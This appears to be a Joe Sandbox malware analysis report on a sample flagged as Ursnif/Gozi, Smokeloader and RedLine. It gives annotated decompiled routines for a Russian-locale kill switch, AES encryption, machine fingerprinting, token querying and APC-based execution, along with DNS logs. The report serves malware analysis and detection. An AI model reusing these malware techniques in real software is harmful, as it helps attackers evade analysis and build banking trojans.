CreateFileW
USER32.dll | LoadMenuA
Language of compilation system | Country where language is spoken
Sami Lappish | Finland
Sami Lappish | Norway
Sami Lappish | Sweden
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 20, 2023 13:48:06.764988899 CET | 49977 | 53 | 192.168.2.3 | 8.8.8.8
Mar 20, 2023 13:48:06.785341024 CET | 53 | 49977 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 20, 2023 13:48:06.764988899 CET | 192.168.2.3 | 8.8.8.8 | 0x7987 | Standard query (0) | checklist.skype.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 20, 2023 13:48:06.785341024 CET | 8.8.8.8 | 192.168.2.3 | 0x7987 | Name error (3) | checklist.skype.com | none | none | A (IP address) | IN (0x0001) | false

              Target ID:0
              Start time:13:47:21
              Start date:20/03/2023
              Path:C:\Users\user\Desktop\server.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\server.exe
              Imagebase:0x400000
              File size:181760 bytes
              MD5 hash:2CA14653601A8E9ADB830E183C5874D7
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.517545518.0000000000716000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              Reputation: low


                Control-flow Graph

                C-Code - Quality: 85%
                			E004019F1() {
                				long _v8;
                				char _v12;
                				char _v16;
                				void* _v40;
                				long _t28;
                				long _t30;
                				long _t31;
                				signed short _t33;
                				void* _t37;
                				long _t40;
                				long _t41;
                				void* _t48;
                				intOrPtr _t50;
                				signed int _t57;
                				signed int _t58;
                				long _t63;
                				long _t65;
                				intOrPtr _t66;
                				void* _t71;
                				void* _t75;
                				signed int _t77;
                				signed int _t78;
                				void* _t82;
                				intOrPtr* _t83;
                
                				// E00401D68 (see the APIs list below): creates an event, reads the OS version and opens the current process; any non-zero status aborts
                				_t28 = E00401D68();
                				_v8 = _t28;
                				if(_t28 != 0) {
                					return _t28;
                				}
                				do {
                					_t77 = 0;
                					_v12 = 0;
                					// 0x30 == sizeof(SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION); the buffer grows one entry at a time
                					_t63 = 0x30;
                					do {
                						_t71 = E004012E6(_t63); // heap allocation (RtlAllocateHeap in the subcall, per the APIs list)
                						if(_t71 == 0) {
                							_v8 = 8; // ERROR_NOT_ENOUGH_MEMORY
                						} else {
                							// information class 8 == SystemProcessorPerformanceInformation
                							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
                							_t67 = _t57;
                							_t58 = _t57 & 0x0000ffff;
                							_v8 = _t58;
                							// low word 4 == STATUS_INFO_LENGTH_MISMATCH (0xC0000004): retry with one more entry
                							if(_t58 == 4) {
                								_t63 = _t63 + 0x30;
                							}
                							_t78 = 0x13;
                							_t10 = _t67 + 1; // 0x1
                							// first dword of the returned block (low part of IdleTime) mod 19, plus 1: a per-machine pseudo-random delay factor
                							_t77 =  *_t71 % _t78 + _t10;
                							E00401BA9(_t71); // releases the buffer (inferred from the pairing with E004012E6)
                						}
                					} while (_v8 != 0);
                					_t30 = E00401688(_t77); // executed
                					_v8 = _t30;
                					Sleep(_t77 << 4); // executed; sleeps _t77 * 16 ms
                					_t31 = _v8;
                				} while (_t31 == 0x15); // 0x15 == ERROR_NOT_READY: repeat the whole sequence
                				if(_t31 != 0) {
                					L30:
                					return _t31;
                				}
                				_v12 = 0;
                				// LOCALE_USER_DEFAULT (0x400), LOCALE_SISO3166CTRYNAME (0x5a): two-letter ISO 3166 country code of the user locale
                				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
                				if(_t33 == 0) {
                					// fallback: derive a language name from the system default UI language
                					__imp__GetSystemDefaultUILanguage();
                					_t67 =  &_v12;
                					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
                				}
                				// 0x5552 read little-endian is the string "RU": on a Russian locale the worker thread below is never started (L28 -> L30)
                				if(_v12 == 0x5552) {
                					L28:
                					_t31 = _v8;
                					if(_t31 == 0xffffffff) {
                						_t31 = GetLastError();
                					}
                					goto L30;
                				} else {
                					if(E00401800(_t67,  &_v16) != 0) {
                						 *0x404178 = 0;
                						L20:
                						// worker thread whose start routine is SleepEx (an alertable wait); the actual work is queued into it as an APC
                						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x404180, 0, 0); // executed
                						_t82 = _t37;
                						if(_t82 == 0) {
                							L27:
                							_v8 = GetLastError();
                							goto L28;
                						}
                						// E0040139F runs inside that thread as a user-mode APC; the thread's exit code becomes this function's result
                						_t40 = QueueUserAPC(E0040139F, _t82,  &_v40); // executed
                						if(_t40 == 0) {
                							_t65 = GetLastError();
                							TerminateThread(_t82, _t65);
                							CloseHandle(_t82);
                							_t82 = 0;
                							SetLastError(_t65);
                						}
                						if(_t82 == 0) {
                							goto L27;
                						} else {
                							_t41 = WaitForSingleObject(_t82, 0xffffffff);
                							_v8 = _t41;
                							if(_t41 == 0) {
                								GetExitCodeThread(_t82,  &_v8);
                							}
                							CloseHandle(_t82);
                							goto L28;
                						}
                					}
                					_t66 = _v16;
                					_t83 = __imp__GetLongPathNameW;
                					// first call with a NULL buffer returns the required length; the second call below fills a fresh allocation that is stored at 0x404178
                					_t48 =  *_t83(_t66, 0, 0); // executed
                					_t75 = _t48;
                					if(_t75 == 0) {
                						L18:
                						 *0x404178 = _t66;
                						goto L20;
                					}
                					_t22 = _t75 + 2; // 0x2
                					_t50 = E004012E6(_t75 + _t22);
                					 *0x404178 = _t50;
                					if(_t50 == 0) {
                						goto L18;
                					}
                					 *_t83(_t66, _t50, _t75); // executed
                					E00401BA9(_t66);
                					goto L20;
                				}
                			}


                APIs
                  • Part of subcall function 00401D68: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
                  • Part of subcall function 00401D68: GetVersion.KERNEL32 ref: 00401D86
                  • Part of subcall function 00401D68: GetCurrentProcessId.KERNEL32 ref: 00401DA2
                  • Part of subcall function 00401D68: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
                  • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
                • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00401A26
                • Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
                • GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
                • GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
                • VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
                • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
                • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
                • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 00401B27
                • QueueUserAPC.KERNELBASE(0040139F,00000000,?,?,00000000), ref: 00401B3D
                • GetLastError.KERNEL32(?,00000000), ref: 00401B4D
                • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B57
                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B5E
                • SetLastError.KERNEL32(00000000,?,00000000), ref: 00401B63
                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401B70
                • GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B82
                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B89
                • GetLastError.KERNEL32(?,00000000), ref: 00401B8D
                • GetLastError.KERNEL32(?,00000000), ref: 00401B9E
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
                • String ID:
                • API String ID: 3475612337-0
                • Opcode ID: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
                • Instruction ID: e4abbca9115d716754b6864e37b0832fe911a2439c52af45cdd796d0275508de
                • Opcode Fuzzy Hash: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
                • Instruction Fuzzy Hash: 4E519E71901214ABE721AFA59D48EAFBA7CAB45755F104177F901F32A0EB389A40CB68
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 50%
                			E02221508(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                				int _v8;
                				long* _v12;
                				int _v16;
                				void* _v20;
                				long* _v24;
                				void* _v39;
                				char _v40;
                				void _v56;
                				int _v60;
                				intOrPtr _v64;
                				void _v67;
                				char _v68;
                				void* _t61;
                				int _t68;
                				signed int _t76;
                				int _t79;
                				int _t81;
                				void* _t85;
                				long _t86;
                				int _t90;
                				signed int _t94;
                				int _t101;
                				void* _t102;
                				int _t103;
                				void* _t104;
                				void* _t105;
                				void* _t106;
                
                				_t103 = __eax; // input length in bytes
                				_t94 = 6;
                				// zero the 0x1c-byte key blob built at _v68 (memset covers 24 bytes, stosw/stosb the rest)
                				_v68 = 0;
                				memset( &_v67, 0, _t94 << 2);
                				_t105 = _t104 + 0xc;
                				asm("stosw");
                				asm("stosb");
                				// zero the 16-byte IV at _v40
                				_v40 = 0;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosw");
                				asm("stosb");
                				// CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES (0x18), CRYPT_VERIFYCONTEXT (0xf0000000)), called through the import slot at 0x222a0e8
                				_t61 =  *0x222a0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                				if(_t61 == 0) {
                					_a8 = GetLastError();
                				} else {
                					_t101 = 0x10;
                					// PLAINTEXTKEYBLOB: bType 8, bVersion 2 (CUR_BLOB_VERSION), aiKeyAlg 0x660e (CALG_AES_128), keyLength 16, then the 16 key bytes copied from _a8
                					memcpy( &_v56, _a8, _t101);
                					_t106 = _t105 + 0xc;
                					_v60 = _t101;
                					_v67 = 2;
                					_v64 = 0x660e;
                					_v68 = 8;
                					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                					if(_t68 == 0) {
                						_a8 = GetLastError();
                					} else {
                						// CryptSetKeyParam(hKey, KP_IV (1), &_v40, 0) per the APIs list below: an all-zero IV; CryptoAPI block ciphers default to CBC mode
                						_push(0);
                						_push( &_v40);
                						_push(1);
                						_push(_v12);
                						if( *0x222a0e4() == 0) {
                							_a8 = GetLastError();
                						} else {
                							// round the length up to a multiple of 16; when encrypting (_a4 != 0) an already aligned length gets one extra block for padding
                							_t18 = _t103 + 0xf; // 0x10
                							_t76 = _t18 & 0xfffffff0;
                							if(_a4 != 0 && _t76 == _t103) {
                								_t76 = _t76 + _t101;
                							}
                							_t102 = E022233DC(_t76); // output buffer allocation
                							_v20 = _t102;
                							if(_t102 == 0) {
                								_a8 = 8; // ERROR_NOT_ENOUGH_MEMORY
                							} else {
                								_v16 = 0;
                								_a8 = 0;
                								// process the input one 16-byte block at a time; Final is set on the last block (_t103 reaches 0 after the copy)
                								while(1) {
                									_t79 = 0x10;
                									_v8 = _t79;
                									if(_t103 <= _t79) {
                										_v8 = _t103;
                									}
                									memcpy(_t102, _a12, _v8);
                									_t81 = _v8;
                									_a12 = _a12 + _t81;
                									_t103 = _t103 - _t81;
                									_t106 = _t106 + 0xc;
                									if(_a4 == 0) {
                										// six-argument call through an import slot the report does not name; the shape matches CryptDecrypt(hKey, 0, Final, 0, pbData, &len) (inferred)
                										_t85 =  *0x222a0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                									} else {
                										// CryptEncrypt(hKey, 0, Final, 0, pbData, &len, dwBufLen 0x20) per the APIs list below
                										_t85 =  *0x222a0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                									}
                									if(_t85 == 0) {
                										break;
                									}
                									_t90 = _v8;
                									_v16 = _v16 + _t90;
                									_t102 = _t102 + _t90;
                									if(_t103 != 0) {
                										continue;
                									} else {
                										L17:
                										// hand back the buffer and the processed length through the out-parameters
                										 *_a16 = _v20;
                										 *_a20 = _v16;
                									}
                									goto L21;
                								}
                								_t86 = GetLastError();
                								_a8 = _t86;
                								if(_t86 != 0) {
                									E022261DA(_v20); // release the output buffer on failure
                								} else {
                									goto L17;
                								}
                							}
                						}
                						L21:
                						CryptDestroyKey(_v12);
                					}
                					CryptReleaseContext(_v24, 0);
                				}
                				return _a8; // 0 on success, otherwise a Win32 error code


                APIs
                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,02225088,00000001,02223ECE,00000000), ref: 02221540
                • memcpy.NTDLL(02225088,02223ECE,00000010,?,?,?,02225088,00000001,02223ECE,00000000,?,022266D9,00000000,02223ECE,?,7491C740), ref: 02221559
                • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 02221582
                • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 0222159A
                • memcpy.NTDLL(00000000,7491C740,02BD9600,00000010), ref: 022215EC
                • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,02BD9600,00000020,?,?,00000010), ref: 02221615
                • GetLastError.KERNEL32(?,?,00000010), ref: 02221644
                • GetLastError.KERNEL32 ref: 02221676
                • CryptDestroyKey.ADVAPI32(00000000), ref: 02221682
                • GetLastError.KERNEL32 ref: 0222168A
                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02221697
                • GetLastError.KERNEL32(?,?,?,02225088,00000001,02223ECE,00000000,?,022266D9,00000000,02223ECE,?,7491C740,02223ECE,00000000,02BD9600), ref: 0222169F
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
                • String ID:
                • API String ID: 3401600162-0
                • Opcode ID: ad4873d95d6dc5443343f833d1fffea851b0ecadfb6f28ac05aa0e410b61069f
                • Instruction ID: 51829536dbeb6e702e2dc3a4f76cebd985fcb8acbedfdfd0f13edf3184c8d00e
                • Opcode Fuzzy Hash: ad4873d95d6dc5443343f833d1fffea851b0ecadfb6f28ac05aa0e410b61069f
                • Instruction Fuzzy Hash: 48515CB1910219BFDB20DFE4D888EAE7BB9FB08340F048465F919E6145D7768A68CF60
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 96%
                			E02223BD3(char __eax, void* __esi) {
                				long _v8;
                				char _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int _v28;
                				long _t34;
                				signed int _t39;
                				long _t50;
                				char _t59;
                				intOrPtr _t61;
                				void* _t62;
                				void* _t64;
                				char _t65;
                				intOrPtr* _t67;
                				void* _t68;
                				void* _t69;
                
                				_t69 = __esi; // output structure that receives the per-machine fingerprint
                				_t65 = __eax;
                				_v8 = 0;
                				_v12 = __eax;
                				if(__eax == 0) {
                					_t59 =  *0x222a310; // 0xd448b889: built-in seed used when the caller passes none
                					_v12 = _t59;
                				}
                				_t64 = _t69;
                				E022271CD( &_v12, _t64); // initialise the output structure from the seed
                				if(_t65 != 0) {
                					 *_t69 =  *_t69 ^  *0x222a344 ^ 0x6c7261ae;
                				} else {
                					// no caller-supplied seed: fold a hash of the user name (UTF-16, length in bytes) into dword 0
                					GetUserNameW(0,  &_v8); // executed; sizing call, leaves the required character count in _v8
                					_t50 = _v8;
                					if(_t50 != 0) {
                						_t62 = RtlAllocateHeap( *0x222a2d8, 0, _t50 + _t50);
                						if(_t62 != 0) {
                							if(GetUserNameW(_t62,  &_v8) != 0) {
                								_t64 = _t62;
                								 *_t69 =  *_t69 ^ E022256B9(_v8 + _v8, _t64); // E022256B9(length, buffer): hash of the name (inferred from use)
                							}
                							HeapFree( *0x222a2d8, 0, _t62);
                						}
                					}
                				}
                				// same pattern for the computer name, folded into the dword at offset 0xc
                				_t61 = __imp__;
                				_v8 = _v8 & 0x00000000;
                				GetComputerNameW(0,  &_v8);
                				_t34 = _v8;
                				if(_t34 != 0) {
                					_t68 = RtlAllocateHeap( *0x222a2d8, 0, _t34 + _t34);
                					if(_t68 != 0) {
                						if(GetComputerNameW(_t68,  &_v8) != 0) {
                							_t64 = _t68;
                							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E022256B9(_v8 + _v8, _t64);
                						}
                						HeapFree( *0x222a2d8, 0, _t68);
                					}
                				}
                				// cpuid output registers are stored to _v28.._v16 and three of them are XORed into the dword at offset 4;
                				// the constant 1 and the register names below are decompiler placeholders, not the real cpuid values
                				asm("cpuid");
                				_t67 =  &_v28;
                				 *_t67 = 1;
                				 *((intOrPtr*)(_t67 + 4)) = _t61;
                				 *((intOrPtr*)(_t67 + 8)) = 0;
                				 *(_t67 + 0xc) = _t64;
                				_t39 = _v16 ^ _v20 ^ _v28;
                				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                				return _t39;
                			}

                APIs
                • GetUserNameW.ADVAPI32(00000000,?), ref: 02223C0A
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 02223C21
                • GetUserNameW.ADVAPI32(00000000,?), ref: 02223C2E
                • HeapFree.KERNEL32(00000000,00000000), ref: 02223C4F
                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02223C76
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02223C8A
                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02223C97
                • HeapFree.KERNEL32(00000000,00000000), ref: 02223CB5
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: HeapName$AllocateComputerFreeUser
                • String ID:
                • API String ID: 3239747167-0
                • Opcode ID: 7f23a7ee9ca598509f5b03f58f74ab3fcfe184c3d9ffa57fead221c908d01f9a
                • Instruction ID: c6bd4035ee3dfd19aad5ac29632c47d424c1f01c14e63af0ac36293c408fa7fb
                • Opcode Fuzzy Hash: 7f23a7ee9ca598509f5b03f58f74ab3fcfe184c3d9ffa57fead221c908d01f9a
                • Instruction Fuzzy Hash: F9316B71A1020AFFD720DFE8DD84B6EB7F9EB48300F219469E504D3214D736EA689B10
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 38%
                			E0222421F(char _a4, void* _a8) {
                				void* _v8;
                				void* _v12;
                				char _v16;
                				void* _v20;
                				char _v24;
                				char _v28;
                				char _v32;
                				char _v36;
                				char _v40;
                				void* _v44;
                				void** _t33;
                				void* _t40;
                				void* _t43;
                				void** _t44;
                				intOrPtr* _t47;
                				char _t48;
                
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				_v20 = _a4;
                				_t48 = 0;
                				_v16 = 0;
                				_a4 = 0;
                				_v44 = 0x18;
                				_v40 = 0;
                				_v32 = 0;
                				_v36 = 0;
                				_v28 = 0;
                				_v24 = 0;
                				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                					_t33 =  &_v8;
                					__imp__(_v12, 8, _t33);
                					if(_t33 >= 0) {
                						_t47 = __imp__;
                						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                						_t44 = E022233DC(_a4);
                						if(_t44 != 0) {
                							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                							if(_t40 >= 0) {
                								memcpy(_a8,  *_t44, 0x1c);
                								_t48 = 1;
                							}
                							E022261DA(_t44);
                						}
                						NtClose(_v8); // executed
                					}
                					NtClose(_v12);
                				}
                				return _t48;
                			}

                APIs
                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02224266
                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02224279
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02224295
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 022242B2
                • memcpy.NTDLL(?,00000000,0000001C), ref: 022242BF
                • NtClose.NTDLL(?), ref: 022242D1
                • NtClose.NTDLL(00000000), ref: 022242DB
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                • String ID:
                • API String ID: 2575439697-0
                • Opcode ID: ad64742998e0cb6ed4abf8839039cf354b978943dc751a90a38dca17688bd510
                • Instruction ID: cb00b43d5fb0cc1e9fc19525a5b03af43c5af6399bd6c3ceea9f91548c9564c2
                • Opcode Fuzzy Hash: ad64742998e0cb6ed4abf8839039cf354b978943dc751a90a38dca17688bd510
                • Instruction Fuzzy Hash: 4021077291022CBBDB11AFE5DC44ADEBFBDEB08750F114122F905A6150D7B29B58DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 69%
                			E004015B0(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                				intOrPtr _v12;
                				struct _FILETIME* _v16;
                				short _v60;
                				struct _FILETIME* _t14;
                				intOrPtr _t15;
                				long _t18;
                				void* _t19;
                				void* _t22;
                				intOrPtr _t31;
                				long _t32;
                				void* _t34;
                
                				_t31 = __edx;
                				_t14 =  &_v16;
                				GetSystemTimeAsFileTime(_t14);
                				_push(0x192);
                				_push(0x54d38000);
                				_push(_v12);
                				_push(_v16);
                				L00402026();
                				_push(_t14);
                				_v16 = _t14;
                				_t15 =  *0x404184;
                				_push(_t15 + 0x4051ca);
                				_push(_t15 + 0x4051c0);
                				_push(0x16);
                				_push( &_v60);
                				_v12 = _t31;
                				L00402020();
                				_t18 = _a4;
                				if(_t18 == 0) {
                					_t18 = 0x1000;
                				}
                				_t19 = CreateFileMappingW(0xffffffff, 0x404188, 4, 0, _t18,  &_v60); // executed
                				_t34 = _t19;
                				if(_t34 == 0) {
                					_t32 = GetLastError();
                				} else {
                					if(_a4 != 0 || GetLastError() == 0xb7) {
                						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                						if(_t22 == 0) {
                							_t32 = GetLastError();
                							if(_t32 != 0) {
                								goto L9;
                							}
                						} else {
                							 *_a8 = _t34;
                							 *_a12 = _t22;
                							_t32 = 0;
                						}
                					} else {
                						_t32 = 2;
                						L9:
                						CloseHandle(_t34);
                					}
                				}
                				return _t32;
                			}

                APIs
